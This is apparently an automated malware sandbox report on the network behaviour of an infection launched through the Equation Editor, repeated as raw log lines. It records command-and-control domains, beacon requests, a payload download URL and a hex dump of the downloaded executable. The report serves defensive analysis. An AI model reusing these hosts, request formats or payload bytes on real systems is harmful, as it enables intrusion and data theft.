      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49193 -> 13.248.169.48:80
      Source: global trafficTCP traffic: 192.168.2.22:49196 -> 104.17.158.1:80
      Source: global trafficTCP traffic: 192.168.2.22:49199 -> 188.114.96.3:80

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.orbit4dads.com
      Source: C:\Windows\explorer.exeDomain query: www.dyj97.com
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.17.158.1 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.folado.com
      Source: C:\Windows\explorer.exeDomain query: www.cell-phones-0406-da-sa-fb.xyz
      Performs DNS queries to domains with low reputation
      Source: C:\Windows\explorer.exeDNS query: www.cell-phones-0406-da-sa-fb.xyz
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.marineqs.com/hs95/
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=nMb/sedmpeBr7+ghqSOwC1xbmX5P5zzgM9CDx9I+q0VFP3WV4QSSvpToeK8jsn7ZNXtM7Q==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.folado.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=7/SnWjC4QSLaRnvMg83QdIn7p4XRRaufQw3ayVgZFyp+C6x9joVaVP2qVgz+otvkZ3B/aw==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.cell-phones-0406-da-sa-fb.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.orbit4dads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 13 Jun 2023 09:01:19 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4Last-Modified: Tue, 13 Jun 2023 06:06:44 GMTETag: "cf000-5fdfca3c004b5"Accept-Ranges: bytesContent-Length: 847872Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 b9 19 94 cc 00 00 00 00 00 00 00 00 f0 00 2e 00 0b 02 30 00 00 e8 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 a8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 07 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 e7 0c 00 00 20 00 00 00 e8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 05 00 00 00 20 0d 00 00 06 00 00 00 ea 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 c4 78 00 00 c8 43 00 00 01 00 00 00 01 00 00 06 8c bc 00 00 c8 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 07 00 a9 01 00 00 01 00 00 11 2b 05 28 45 00 3a 37 00 20 e1 84 a5 b0 20 01 00 00 00 63 20 70 c2 52 d8 61 28 2a 00 00 06 20 00 83 29 8f 20 58 6b 21 8f 61 28 2a 00 00 06 20 e0 ef 00 96 20 80 07 08 96 61 28 2a 00 00 06 28 10 00 00 0a 20 14 d4 45 05 20 72 3c 4d 05 61 28 2a 00 00 06 20 8a e1 9f a4 20 f0 0c 52 f2 61 20 0a 05 c5 56 61 28 2a 00 00 06 6f 10 00 00 0a 20 3c d5 ee 69 66 20 b5 c2 19 96 61 28 2a 00 00 06 20 45 80 14 16 20 39 68 1c 16 61 28 2a 00 00 06 6f 10 00 00 0a 20 1d 96 cb 6f 20 9f 7e c3 6f 61 28 2a 00 00 06 20 ea 37 77 28 20 62 df 7f 28 61 28 2a 00 00 06 6f 10 00 00 0a 20 21 e3 8a d9 20 05 00 00 00 62 20 ae 8c 54 31 61 28 2a 00 00 06 20 31 c1 9e e4 20 02 00 00 00 62 20 5e ec 73 92 61 28 2a 00 00 06 6f 10 00 00 0a 0a 06 28 11 00 00 0a 0b 20 3e c3 8b 10 20 9e 2b 83 10 61 28 2a 00 00 06 0c 20 b9 4a 56 0a 20 4e 29 ca 2b 58 20 b9 9c 28 36 61 28 2a 00 00 06 0d 20 f1 5f 64 8d 20 39 b7 6c 8d
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49183 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49184 version: TLS 1.0
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F061D URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F061D
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: EQNEDT32.EXE, 00000005.00000002.1028643416.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://15.223.2.12/102/cleanmgr.exe
      Source: EQNEDT32.EXE, 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://15.223.2.12/102/cleanmgr.exej
      Source: EQNEDT32.EXE, 00000005.00000002.1028643416.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://15.223.2.12/102/cleanmgr.exemmC:
      Source: explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000009.00000000.1037825440.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000009.00000002.1301045623.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000009.00000000.1037825440.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babolcai.sbs
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babolcai.sbs/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babolcai.sbs/hs95/www.bscscan.help
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babolcai.sbsReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biyaheph.online
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biyaheph.online/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biyaheph.online/hs95/www.babolcai.sbs
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biyaheph.onlineReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bscscan.help
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bscscan.help/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bscscan.help/hs95/www.renelle.net
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bscscan.helpReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305552060.000000000B32D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1306188239.000000000BF89000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cell-phones-0406-da-sa-fb.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305552060.000000000B32D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1306188239.000000000BF89000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cell-phones-0406-da-sa-fb.xyz/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cell-phones-0406-da-sa-fb.xyz/hs95/www.dyj97.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cell-phones-0406-da-sa-fb.xyzReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dyj97.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dyj97.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dyj97.com/hs95/www.orbit4dads.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dyj97.comReferer:
      Source: explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fire-og.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fire-og.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fire-og.com/hs95/www.hezop.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fire-og.comReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.folado.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.folado.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.folado.com/hs95/www.cell-phones-0406-da-sa-fb.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.folado.comReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.h9zpoi11.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.h9zpoi11.xyz/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.h9zpoi11.xyz/hs95/www.marineqs.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.h9zpoi11.xyzReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hezop.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hezop.xyz/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hezop.xyz/hs95/www.h9zpoi11.xyz
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hezop.xyzReferer:
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kyinyuanwoaini1.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kyinyuanwoaini1.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kyinyuanwoaini1.com/hs95/www.fire-og.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kyinyuanwoaini1.comReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marineqs.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marineqs.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marineqs.com/hs95/www.trhghfghfgh.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marineqs.comReferer:
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orbit4dads.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orbit4dads.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orbit4dads.com/hs95/www.biyaheph.online
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orbit4dads.comReferer:
      Source: explorer.exe, 00000009.00000002.1302557807.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047820508.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1041936992.00000000044B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1295616980.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1046647563.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1038873621.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1303350467.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305022343.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1302557807.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000009.00000000.1046647563.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1302557807.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
      Source: explorer.exe, 00000009.00000000.1041936992.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047150190.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1047820508.000000000891C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1041936992.00000000044B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1303350467.000000000868E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305022343.000000000891C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000002.1295616980.0000000002CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1038873621.0000000002CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
